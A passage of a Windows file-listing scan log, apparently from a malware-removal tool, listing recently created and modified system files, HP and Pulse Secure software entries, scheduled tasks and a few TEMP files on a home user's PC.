2016-11-08 15:57 - 2016-10-10 09:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-11-08 15:57 - 2016-10-10 09:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-11-08 15:57 - 2016-10-10 08:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-11-08 15:57 - 2016-10-10 08:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-11-08 15:57 - 2016-10-10 08:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-11-08 15:57 - 2016-10-10 08:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-11-08 15:57 - 2016-10-10 08:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-11-08 15:57 - 2016-10-10 08:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-11-08 15:57 - 2016-10-07 09:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-11-08 15:57 - 2016-10-07 09:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-11-08 15:57 - 2016-10-07 09:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-11-08 15:57 - 2016-10-07 09:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-11-08 15:57 - 2016-10-07 09:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-11-08 15:57 - 2016-10-07 09:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-11-08 15:57 - 2016-10-07 09:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-11-08 15:57 - 2016-10-07 09:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-11-08 15:57 - 2016-10-07 09:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-11-08 15:57 - 2016-10-07 09:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-11-08 15:57 - 2016-10-07 08:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-11-08 15:57 - 2016-10-07 08:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-11-08 15:57 - 2016-10-07 08:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-11-08 15:57 - 2016-10-07 08:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-11-08 15:57 - 2016-10-07 08:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-11-08 15:57 - 2016-10-07 08:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 08:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 08:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 08:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-11-08 15:57 - 2016-10-05 08:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2016-11-08 15:57 - 2016-09-15 08:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-11-08 15:57 - 2016-09-13 09:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-11-08 15:57 - 2016-09-13 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-11-08 15:57 - 2016-09-09 12:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-11-08 15:57 - 2016-09-09 12:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-11-08 15:57 - 2016-08-22 10:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-11-05 13:11 - 2016-11-05 13:12 - 00045056 ___SH C:\Users\Public\Documents\Thumbs.db
2016-11-05 10:34 - 2016-11-12 18:41 - 00000328 _____ C:\Windows\Tasks\HPCeeScheduleForDale.job
2016-11-05 10:34 - 2016-11-12 07:38 - 00003180 _____ C:\Windows\System32\Tasks\HPCeeScheduleForDale
2016-11-05 10:34 - 2016-11-05 10:34 - 00000000 ____D C:\Users\Dale\AppData\Local\HP_Development_Company,_L
2016-11-04 18:50 - 2016-11-04 18:50 - 00001115 _____ C:\Users\Public\Desktop\HP Photo Creations.lnk
2016-11-04 18:50 - 2016-11-04 18:50 - 00000000 ____D C:\ProgramData\HP Photo Creations
2016-11-04 18:50 - 2016-11-04 18:50 - 00000000 ____D C:\Program Files (x86)\HP Photo Creations
2016-11-04 18:49 - 2016-11-04 18:49 - 00001976 _____ C:\Users\Public\Desktop\HP ePrinterCenter.lnk
2016-11-04 18:49 - 2016-11-04 18:49 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\HP Solution Center.lnk
2016-11-04 18:49 - 2016-11-04 18:49 - 00001315 _____ C:\Users\Public\Desktop\HP Solution Center.lnk
2016-11-04 18:49 - 2016-11-04 18:49 - 00000000 ____D C:\ProgramData\HP Product Assistant
2016-11-04 18:48 - 2016-11-08 17:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-11-04 18:47 - 2016-11-04 18:54 - 00206371 _____ C:\Windows\hpoins49.dat
2016-11-04 18:47 - 2010-04-23 16:51 - 00001241 ____N C:\Windows\hpomdl49.dat
2016-11-04 18:36 - 2016-11-04 18:36 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Hewlett-Packard
2016-11-04 18:28 - 2016-11-04 18:28 - 00002243 _____ C:\Users\Public\Desktop\HP Support Assistant.lnk
2016-11-04 18:28 - 2016-11-04 18:28 - 00000000 ____D C:\System.sav
2016-11-04 18:28 - 2016-11-04 18:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2016-11-04 18:27 - 2016-11-04 18:27 - 00000000 ____D C:\Users\Dale\AppData\Roaming\hpqLog
2016-11-01 18:47 - 2016-11-01 18:47 - 00000000 ____D C:\Users\Public\Juniper Networks
2016-11-01 18:47 - 2016-11-01 18:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pulse Secure
2016-11-01 18:47 - 2015-10-22 16:51 - 00592216 _____ (Pulse Secure, LLC) C:\Windows\system32\dsNcSmartCardProv.dll
2016-11-01 18:47 - 2015-10-22 16:51 - 00421720 _____ (Pulse Secure, LLC) C:\Windows\system32\dsNcCredProv.dll
2016-11-01 18:46 - 2016-11-08 17:54 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pulse Secure
2016-11-01 18:46 - 2016-11-01 18:47 - 00000000 ____D C:\Program Files (x86)\Juniper Networks
2016-11-01 18:44 - 2016-11-01 18:44 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (7).exe
2016-11-01 18:42 - 2016-11-08 17:54 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Juniper Networks
2016-11-01 18:42 - 2016-11-01 18:42 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (6).exe
2016-11-01 18:42 - 2016-11-01 18:42 - 00000000 ____D C:\Users\Dale\AppData\Local\Juniper Networks
2016-11-01 18:41 - 2016-11-01 18:41 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (5).exe
2016-11-01 18:40 - 2016-11-01 18:40 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (4).exe
2016-10-31 18:14 - 2016-10-25 20:33 - 00621708 _____ C:\Users\Public\Documents\First Free Contact Directory Feb 2016.pdf
2016-10-28 15:10 - 2016-10-28 15:10 - 00000000 ____D C:\Windows\pss
2016-10-24 18:17 - 2016-10-24 18:17 - 00000000 ____D C:\Users\Dale\Desktop\Log
2016-10-18 20:09 - 2016-10-18 20:09 - 01141650 _____ C:\Users\Public\Documents\How-to-Achieve-a-Rich-Mindset.pdf
2016-10-15 19:00 - 2016-10-15 19:00 - 00003216 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2016-10-15 11:50 - 2016-11-11 20:38 - 00000000 ____D C:\Users\Public\Documents\For Brad 2
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-12 19:48 - 2016-07-12 14:44 - 00000556 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job
2016-11-12 19:46 - 2016-01-13 20:35 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
2016-11-12 19:42 - 2016-07-12 14:44 - 00000652 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job
2016-11-12 19:42 - 2009-07-13 22:45 - 00022768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-12 19:42 - 2009-07-13 22:45 - 00022768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-12 19:38 - 2009-07-13 23:13 - 00781298 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-12 19:38 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\inf
2016-11-12 19:34 - 2016-07-28 15:26 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d1e916bc7e32e3.job
2016-11-12 19:34 - 2016-01-24 15:54 - 00000286 _____ C:\Windows\Tasks\NUAutoUpdate.job
2016-11-12 19:34 - 2009-07-13 23:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-12 19:34 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\L2Schemas
2016-11-12 19:32 - 2016-09-28 19:52 - 00000000 ____D C:\Users\Dale\AppData\Local\e2f44a7
2016-11-12 19:31 - 2016-07-28 15:26 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d1e916bd037ff2.job
2016-11-12 18:39 - 2016-01-09 08:46 - 00000000 ____D C:\Users\Dale
2016-11-12 18:15 - 2016-01-17 19:57 - 00000000 ____D C:\Users\Dale\Documents\Outlook Files
2016-11-12 17:00 - 2016-01-19 20:33 - 50839694 _____ C:\Users\Dale\QDATA.QDF
2016-11-12 11:54 - 2016-01-19 17:21 - 00000000 ____D C:\Program Files (x86)\Quicken
2016-11-12 10:18 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\rescache
2016-11-11 22:37 - 2016-01-09 11:19 - 00000000 ____D C:\Users\Dale\AppData\Local\Google
2016-11-10 23:02 - 2016-01-19 21:10 - 00000000 ____D C:\Users\Dale\BACKUP
2016-11-08 23:22 - 2016-01-17 20:08 - 00000000 ____D C:\Users\Dale\Desktop\Dale's personal
2016-11-08 19:25 - 2009-07-13 23:32 - 00000000 ____D C:\Windows\Downloaded Program Files
2016-11-08 19:23 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-08 19:16 - 2009-07-13 22:45 - 00448416 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-08 18:22 - 2016-01-10 19:29 - 00000000 ____D C:\Windows\system32\MRT
2016-11-08 18:18 - 2016-01-10 19:28 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-11-08 18:02 - 2016-01-24 18:20 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Norton Utilities 16
2016-11-08 18:02 - 2016-01-24 15:51 - 00000000 ____D C:\ProgramData\TEMP
2016-11-08 17:58 - 2016-01-11 16:47 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-11-08 17:54 - 2016-01-11 17:10 - 00000000 ____D C:\Program Files (x86)\HP
2016-11-08 17:54 - 2011-04-12 02:28 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-11-08 17:54 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\registration
2016-11-08 15:44 - 2016-01-24 15:54 - 00000278 _____ C:\Windows\Tasks\NUSchedule.job
2016-11-07 18:29 - 2016-03-13 20:38 - 00000000 ____D C:\Users\Dale\AppData\Local\CrashDumps
2016-11-05 12:53 - 2016-02-02 18:02 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-11-05 12:53 - 2016-01-11 17:06 - 00000000 ____D C:\Windows\System32\Tasks\Hewlett-Packard
2016-11-05 12:47 - 2009-07-13 20:34 - 96993280 _____ C:\Windows\system32\config\software.rmbak
2016-11-05 12:47 - 2009-07-13 20:34 - 00524288 _____ C:\Windows\system32\config\default.rmbak
2016-11-04 18:53 - 2016-01-09 11:35 - 00115984 _____ C:\Users\Dale\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-04 18:53 - 2009-07-13 20:34 - 00000438 _____ C:\Windows\win.ini
2016-11-04 18:51 - 2016-01-11 17:13 - 00000000 ____D C:\Program Files (x86)\MSN Toolbar Installer
2016-11-04 18:50 - 2016-01-11 17:13 - 00000000 ____D C:\Users\Dale\AppData\Roaming\HpUpdate
2016-11-04 18:50 - 2016-01-11 17:09 - 00000000 ____D C:\ProgramData\HP
2016-11-04 18:45 - 2016-01-11 17:07 - 00000000 ____D C:\Users\Dale\Downloads\HP Downloads
2016-11-04 18:42 - 2016-01-11 17:07 - 00000000 ____D C:\Users\Dale\AppData\Local\Hewlett-Packard
2016-11-04 18:28 - 2016-01-11 17:06 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-11-04 18:28 - 2016-01-09 11:24 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-01 16:40 - 2016-07-12 14:44 - 00003676 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000
2016-11-01 16:40 - 2016-07-12 14:44 - 00003580 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000
2016-11-01 16:32 - 2016-02-22 19:37 - 00002197 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-01 16:32 - 2016-02-22 19:37 - 00002185 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-10-28 16:27 - 2016-01-09 13:11 - 00000000 ____D C:\Users\Dale\AppData\Local\Adobe
2016-10-28 13:40 - 2016-10-12 15:35 - 00000000 ____D C:\Users\Dale\AppData\Local\NPE
2016-10-22 10:27 - 2016-01-17 20:11 - 00000000 ____D C:\Users\Dale\Desktop\Recipes
2016-10-15 19:06 - 2016-03-15 19:59 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security
2016-10-15 19:00 - 2016-06-26 10:58 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2016-10-15 19:00 - 2016-01-10 04:40 - 00002292 _____ C:\Users\Public\Desktop\Norton Security.lnk
2016-10-15 19:00 - 2016-01-10 04:39 - 00000000 ____D C:\Windows\system32\Drivers\NSx64
2016-10-15 13:33 - 2016-01-10 04:40 - 00100592 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2016-10-15 13:33 - 2016-01-10 04:40 - 00008319 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
 
==================== Files in the root of some directories =======
 
2016-03-21 16:48 - 2016-09-24 19:33 - 3670016 _____ () C:\ProgramData\fcInstall.etl
2016-03-21 16:48 - 2016-09-24 19:33 - 0579312 _____ () C:\ProgramData\fcInstall.log
2016-05-15 13:23 - 2016-10-04 17:27 - 7340032 _____ () C:\ProgramData\fcUninstall.etl
2016-05-15 13:23 - 2016-10-04 17:27 - 0369837 _____ () C:\ProgramData\fcUninstall.log
2016-01-11 17:09 - 2016-11-08 17:49 - 0009510 _____ () C:\ProgramData\hpzinstall.log
2016-01-24 15:11 - 2016-02-06 10:07 - 0000469 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
 
Some files in TEMP:
====================
C:\Users\Dale\AppData\Local\Temp\libeay32.dll
C:\Users\Dale\AppData\Local\Temp\msvcr120.dll
C:\Users\Dale\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
